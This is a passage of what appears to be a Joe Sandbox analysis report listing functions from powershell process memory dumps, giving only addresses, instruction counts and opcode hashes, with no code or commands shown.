                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da0d62bfacf0767b3d62d092a8981471cb7872f374753c84cfea2b4141bb61a7
                                      • Instruction ID: 16cea8951296bd7067df64b114b3bf609fc815e0c038539ebd8f3db98089f8a9
                                      • Opcode Fuzzy Hash: da0d62bfacf0767b3d62d092a8981471cb7872f374753c84cfea2b4141bb61a7
                                      • Instruction Fuzzy Hash: 3BD17130B18A4D8FDF94EF58C455AAD7BE1FF68300F1542AAD449D72A6CA34E841CBC1
                                      Function 00007FFD9B8C664D Relevance: .4, Instructions: 406COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794955565.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 194b7ffdaf5d3bfb00401001df2a517e44cde71c8afdd75c1aa5723bbeb958e1
                                      • Instruction ID: 8fc2ee4912e4c6494e009ea4ffc067d3f422e97feda26251617632c3775de10d
                                      • Opcode Fuzzy Hash: 194b7ffdaf5d3bfb00401001df2a517e44cde71c8afdd75c1aa5723bbeb958e1
                                      • Instruction Fuzzy Hash: 91C167B2B0FA8E4FEB65EB6888649B57BD1EF69310B0901FFD45DC70E3D918A8058341
                                      Function 00007FFD9B7F9F55 Relevance: .2, Instructions: 218COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fba4fbb7ba4127c7f75986453d4152b543fdf33e745eaa47a1904c555efebf86
                                      • Instruction ID: 8e848fc628179b38dda45694cfb201f69b9c3586c80d90c4ead7b2cf19878e5a
                                      • Opcode Fuzzy Hash: fba4fbb7ba4127c7f75986453d4152b543fdf33e745eaa47a1904c555efebf86
                                      • Instruction Fuzzy Hash: 16516023F0B79A0FD711EB6DA87A4E53FB0EF51669B0942B3C0D84A0B3FD05255646C5
                                      Function 00007FFD9B7F9738 Relevance: .1, Instructions: 142COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19b571a1d1b1b7dcd60ccd6e47a69867ff30c6915934733982a803b7fc8a0e6e
                                      • Instruction ID: 994f9b132038e0e048d84fecee41090c7bec30d1a8c57844e11d17efd82f0372
                                      • Opcode Fuzzy Hash: 19b571a1d1b1b7dcd60ccd6e47a69867ff30c6915934733982a803b7fc8a0e6e
                                      • Instruction Fuzzy Hash: FE411B31A0DB4C4FDB589F5C980A6B9BBE0FB95711F14822FE449C3262DA20E915CBC6
                                      Function 00007FFD9B6DE380 Relevance: .1, Instructions: 129COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794148959.00007FFD9B6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6DD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b6dd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3ba9bd9417b613bde48bb229120606bb90388cd7aea5060a94a89a6cd0813334
                                      • Instruction ID: f2cbd2f43c22ef509b472b1af15cd5ae24fb58c762ef9cceaa31cd9b52860905
                                      • Opcode Fuzzy Hash: 3ba9bd9417b613bde48bb229120606bb90388cd7aea5060a94a89a6cd0813334
                                      • Instruction Fuzzy Hash: 8041E77150EBC44FEB668B299C559623FB0EF52314B1706EFD0C8CB1A3D625B846C792
                                      Function 00007FFD9B7FA47C Relevance: .1, Instructions: 102COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 63f024787d56bd826855ee31cd86614c67e09e0b03a16c5541d096be4f5a2123
                                      • Instruction ID: 53c277f7a13e31bd47e3a5e49e1bb99c47199a372af31d79fbed6a142da36ff3
                                      • Opcode Fuzzy Hash: 63f024787d56bd826855ee31cd86614c67e09e0b03a16c5541d096be4f5a2123
                                      • Instruction Fuzzy Hash: 96210A31A0C74C4FEB59DFAC984A7E97FF0EB96321F04426BD048C3166DA74A41ACB91
                                      Function 00007FFD9B7F33B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45
                                      Function 00007FFD9B8C414D Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794955565.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34f0b6fd2eac7a139f3a2e79696c626e4fce49e3ed08d0a52e25fce513fc9b67
                                      • Instruction ID: 40277f06f6bfad94709ab727ddca0159e156ec25e686d22428e4edf40cf004b7
                                      • Opcode Fuzzy Hash: 34f0b6fd2eac7a139f3a2e79696c626e4fce49e3ed08d0a52e25fce513fc9b67
                                      • Instruction Fuzzy Hash: 18F03A72B0E5498FD769EB5CE4518A873E0EF5932071A00BBE1ADC75B7DA25EC81C740
                                      Function 00007FFD9B8C4400 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794955565.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c9d01475077eb56fb495711a00b000bfe71ebd68553ff63d53bd0a6d100c56f
                                      • Instruction ID: db321727d61d726b1a500bfc178e059f95f7e9a0ad87cd145831165e524c1636
                                      • Opcode Fuzzy Hash: 1c9d01475077eb56fb495711a00b000bfe71ebd68553ff63d53bd0a6d100c56f
                                      • Instruction Fuzzy Hash: B1F05E72A0E5498FDB64EB5CE4618A877E0FF4932475A00BBE159CB4A3DA25EC80C750
                                      Function 00007FFD9B8C41D1 Relevance: .0, Instructions: 29COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794955565.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction ID: 19611bf992d818319ffca05ef679498bf87821be3afbc0c8495d4bacff4bf068
                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction Fuzzy Hash: DCE0E531B0C8088FDA78EB4CE0519A973E1EB9832171611ABD18EC7562CA22ED918B80

                                      Non-executed Functions

                                      Function 00007FFD9B7F8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: L_^4$L_^7$L_^F$L_^J
                                      • API String ID: 0-3225005683
                                      • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                      • Instruction ID: 04a69f08816bc91c8d325c6fadc50cdf1a4162b35631b59aac8caa5ed48679d6
                                      • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                      • Instruction Fuzzy Hash: 022126BBB081654ED305BBBDB8199ED3750CFD423935692F2D2A98B093EE147086CAD0

                                      Executed Functions

                                      Function 00007FFD9B80644D Relevance: .7, Instructions: 718COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1880506771.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e02ca464ea7ae6de21d61a294f11e71a5686d504ea3fd24b06289f8e9f2e65a4
                                      • Instruction ID: 037ac1ab26722afa81261195cb9ffc3c99e142d309db7c23176f4f59250f5e45
                                      • Opcode Fuzzy Hash: e02ca464ea7ae6de21d61a294f11e71a5686d504ea3fd24b06289f8e9f2e65a4
                                      • Instruction Fuzzy Hash: 3DD19070A08A4D8FDF98DF58C465AED7BE1FF68340F15416AD44DD72A6CA34E841CB80
                                      Function 00007FFD9B8D6605 Relevance: .4, Instructions: 442COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1881099198.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5c4f31061658f036eac80b3e5a1deb50c2d3afdb13a21f7ba8942525da38899a
                                      • Instruction ID: 147502fca2da8507c0200f77d821493a0b624a1664ca5e623cbb977bdc2df6e7
                                      • Opcode Fuzzy Hash: 5c4f31061658f036eac80b3e5a1deb50c2d3afdb13a21f7ba8942525da38899a
                                      • Instruction Fuzzy Hash: CAD13672B0FACE4FEB659B6898655A57BE0EF9A214B0903FFD44CC70E3D918A905C341
                                      Function 00007FFD9B6EED40 Relevance: .1, Instructions: 122COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1879869254.00007FFD9B6ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6ED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b6ed000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b9577c27cec7504327d6cd5f36fd87dc7ab4a1f30b6391635785f8d4775a714
                                      • Instruction ID: ef10acf341b012d2ed82b7ef5ce01f43dbd18ae974b7a23ba5e75c3e4b294668
                                      • Opcode Fuzzy Hash: 8b9577c27cec7504327d6cd5f36fd87dc7ab4a1f30b6391635785f8d4775a714
                                      • Instruction Fuzzy Hash: 7B41177140EBC44FD7A6DB289851A523FF0EF56320B1A05DFD0D8CB1A3D629A856C792
                                      Function 00007FFD9B80A49C Relevance: .1, Instructions: 102COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1880506771.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a02f5ce42f4480a829912836bb1478de0265daf31d4b0e8bbd8ef8766e597cf
                                      • Instruction ID: cc77904cff0ecdd33aa5ca95062731f7025171843344ccfe95202e978c4b8e94
                                      • Opcode Fuzzy Hash: 4a02f5ce42f4480a829912836bb1478de0265daf31d4b0e8bbd8ef8766e597cf
                                      • Instruction Fuzzy Hash: 8C21E93190CB4C4FDB59DBAC984A6E97BF0EB96321F04416BD048C7162D674A45ACB91
                                      Function 00007FFD9B8033B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1880506771.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                      • Instruction ID: 2b13d53e025c2be8e90647bd55e6abaa926a26a99d8691448afac0a98a8ed019
                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                      • Instruction Fuzzy Hash: A001A73021CB0D4FD748EF0CE051AA6B3E0FF89360F10056DE58AC36A1DA32E882CB41
                                      Function 00007FFD9B8D414D Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1881099198.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e4478d499bf9b3dfd3fdd36072630ef3bee4ba658ad4c747b6b1c5d84f8e558e
                                      • Instruction ID: 4cecb3fe9d83812d625a24e303b298f06e34d71d7bbc9804dfad11f6b84e9ba6
                                      • Opcode Fuzzy Hash: e4478d499bf9b3dfd3fdd36072630ef3bee4ba658ad4c747b6b1c5d84f8e558e
                                      • Instruction Fuzzy Hash: C6F03A32B0E5498FDB69EB5CE4518A873E0EF99320B1A01BBE16DC75B7DA25EC41C740
                                      Function 00007FFD9B8D4400 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1881099198.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7440e0b304185bed9c53a386fc529318170c296b5ecd6a9ce369f67be978bc91
                                      • Instruction ID: 6d7d4e06dda73e199b4d5e8ed5ea7773aea52152ad03b0648cb777e9397f505b
                                      • Opcode Fuzzy Hash: 7440e0b304185bed9c53a386fc529318170c296b5ecd6a9ce369f67be978bc91
                                      • Instruction Fuzzy Hash: A9F0BE32A0E5498FDB64EB5CE0648A873E0FF4932070A01BBE059CB0A3DA25AC80C740
                                      Function 00007FFD9B8D41D1 Relevance: .0, Instructions: 29COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1881099198.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction ID: 7088ed3d6d6b9d5ea87a478394cc45f134a04600c237e2e00915a735f27c0c4b
                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction Fuzzy Hash: 07E01A31B0C8089FDB78DB4CE0519A973E1EB98331B1602BBD14EC7571CA22ED518B80

                                      Non-executed Functions

                                      Function 00007FFD9B808BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1880506771.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K_^4$K_^5$K_^@$K_^N$K_^U$K_^Y
                                      • API String ID: 0-4293504607
                                      • Opcode ID: 3fd38f493abf8ce8ba33fa036faf8b24e7950b6981b1504f784adbaec5ce111a
                                      • Instruction ID: 39debd1757804db3e97563aba3e1b84bbce0da434c3ed87857006a438589be37
                                      • Opcode Fuzzy Hash: 3fd38f493abf8ce8ba33fa036faf8b24e7950b6981b1504f784adbaec5ce111a
                                      • Instruction Fuzzy Hash: 6831137BB0952A1ED715B6BCB8A55EC67A0DFD437A35683F7D198CB093CC2460CB8680
                                      Function 00007FFD9B8089F2 Relevance: 6.4, Strings: 5, Instructions: 117COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1880506771.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K_^$K_^$K_^$K_^$K_^
                                      • API String ID: 0-4077390204
                                      • Opcode ID: d177b9602deac1fd050b3a5f9405414611bb0a5dbb74a33a2448af149b8b7d7f
                                      • Instruction ID: ec30e71d5c547b23bdb31f6cbf41ca2c868668e4b1760266469aa0d90de5f175
                                      • Opcode Fuzzy Hash: d177b9602deac1fd050b3a5f9405414611bb0a5dbb74a33a2448af149b8b7d7f
                                      • Instruction Fuzzy Hash: 5531A6A3B0F5C61FFB6A476948654D57FA0FF6579830A43F6C0D48A4A3EC0469835252

                                      Executed Functions

                                      Function 00007FFD9B8A6660 Relevance: .4, Instructions: 397COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2029665810.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8e639ea4c3444b00dc016b3446c3697c323248cd551818c395ec26ecbf24271
                                      • Instruction ID: bcecce17065d527f8600b539d35eb0b01543598bc4f299b4a49b8445daff318f
                                      • Opcode Fuzzy Hash: b8e639ea4c3444b00dc016b3446c3697c323248cd551818c395ec26ecbf24271
                                      • Instruction Fuzzy Hash: 54C16972F0FA8E4FEBA5DBA888645B9BBD0EF19314B0901BED45CC70EBD914A804C351
                                      Function 00007FFD9B8A4341 Relevance: .3, Instructions: 305COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2029665810.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a4e1e518066d86f3f64fb2f1315968c60b0208f94122d92ed624791c9344ce0a
                                      • Instruction ID: 4cba30c8bd866edabe71d61e59cf0102e0ff5d57166eee933ef0668c622183da
                                      • Opcode Fuzzy Hash: a4e1e518066d86f3f64fb2f1315968c60b0208f94122d92ed624791c9344ce0a
                                      • Instruction Fuzzy Hash: E3812B32B0FA8D4FEB66976854355B47BD0EF5A320B0E01FED05DC71A3DA14AD068361
                                      Function 00007FFD9B7D9EF5 Relevance: .2, Instructions: 226COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb9866babb108551adfedc33b9e9538d6fcb2739b295e67c55343a63af1b7b85
                                      • Instruction ID: 3bab83c082ccb265706731372ba10aba16842314f89e70d22bcc176d92d5d35e
                                      • Opcode Fuzzy Hash: bb9866babb108551adfedc33b9e9538d6fcb2739b295e67c55343a63af1b7b85
                                      • Instruction Fuzzy Hash: E6717077B0A79A4FD7129BEC9CB50E53BA0EF5126970601B7C598CB073FE14161B8782
                                      Function 00007FFD9B8A4073 Relevance: .2, Instructions: 186COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2029665810.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f382902c67746696f43a811736a22b38f3ec0bd84fb32c21f91ca568cce9d563
                                      • Instruction ID: 6b899ef3b19810da466abf7108cdaf456e705129a9508a77beb421c13796c2b5
                                      • Opcode Fuzzy Hash: f382902c67746696f43a811736a22b38f3ec0bd84fb32c21f91ca568cce9d563
                                      • Instruction Fuzzy Hash: 99511732B0EA8A4FEBA99B6C54626B47BD1EF98210B1E00BEC15DC71A3DE15EC058351
                                      Function 00007FFD9B7D9738 Relevance: .1, Instructions: 142COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c82f8fdc6436dce8449d7b611898aec911c65e05128a82c707a1ea3e3eeb7d5
                                      • Instruction ID: b2eacca444722a3cbffadff7df67ca6a1ce159a172efae9fbafac444a50c6d63
                                      • Opcode Fuzzy Hash: 8c82f8fdc6436dce8449d7b611898aec911c65e05128a82c707a1ea3e3eeb7d5
                                      • Instruction Fuzzy Hash: 51411E71A0DB884FDB589F5C9C1A6B87BE0FB95311F40426FE049D3262DB20B915C7C6
                                      Function 00007FFD9B7D9FE0 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b898bb2ea6044092df81b2ead5f1799ea49f7bd889f4ebe42e852bdc5f65f544
                                      • Instruction ID: 665f81c7eb64d77e9249e0dcb66d471f67d5c00763ad279197f9e7691df89562
                                      • Opcode Fuzzy Hash: b898bb2ea6044092df81b2ead5f1799ea49f7bd889f4ebe42e852bdc5f65f544
                                      • Instruction Fuzzy Hash: B6415B72B0AB8A4FC3129BAC9CA90E53BA0FF513A570601B7D199C7073FF680656C781
                                      Function 00007FFD9B6BEE20 Relevance: .1, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2027392184.00007FFD9B6BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b6bd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f3c190ec311385bc96cdb1d0a7bf069b3d7ba8cbd989d2fae7983ebf5e10e4c4
                                      • Instruction ID: 9f1817dfec31dd77ebae0837860347710e141562923803bcb0b606205bbdfc2f
                                      • Opcode Fuzzy Hash: f3c190ec311385bc96cdb1d0a7bf069b3d7ba8cbd989d2fae7983ebf5e10e4c4
                                      • Instruction Fuzzy Hash: 3A41137140EBC44FD7668B2998519523FF0EF53320B1A05EFD088CB1A3D624A846CBA2
                                      Function 00007FFD9B7DB238 Relevance: .1, Instructions: 102COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b173b59e0cb1293cbaa4cdd5204e4e8836f14fd6f7db779c23b2d022e33117ea
                                      • Instruction ID: bfc51b525eebe42b6118fd2aa3e78c2e96d65ee18ebed6efc70710bbac953c0e
                                      • Opcode Fuzzy Hash: b173b59e0cb1293cbaa4cdd5204e4e8836f14fd6f7db779c23b2d022e33117ea
                                      • Instruction Fuzzy Hash: ED21EA3191CB4C4FDB58DF9C984A7E97BE0EB96331F04826FD049C7166D670584ACB91
                                      Function 00007FFD9B8A40BF Relevance: .1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2029665810.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 565988bee3756961e52bd7ca86f76bcff9f25d416c990eef7028a485d323d670
                                      • Instruction ID: a2884af98bb57d04a1d788f9c1a3d2b81da599698082da621103a4bf7bc708c5
                                      • Opcode Fuzzy Hash: 565988bee3756961e52bd7ca86f76bcff9f25d416c990eef7028a485d323d670
                                      • Instruction Fuzzy Hash: 5021C123B0FA8B4FEBB9DB5844625746AD1EF68210B5E00BED05EC71F2DE18ED058351
                                      Function 00007FFD9B8A43BC Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2029665810.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 996c042fb07241ad1a8206bd613449a26803cc40f8a1888eb34235dc68d69046
                                      • Instruction ID: b89f5f0933814cbe5e3e5977de24bd6e6c58d5102b3e6db767c7017036cb1caa
                                      • Opcode Fuzzy Hash: 996c042fb07241ad1a8206bd613449a26803cc40f8a1888eb34235dc68d69046
                                      • Instruction Fuzzy Hash: 1C11A032B0F5494FEBB5E75894709B876D1EF4832074A00BAE56DC75A2DA19BD018360
                                      Function 00007FFD9B7D33B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
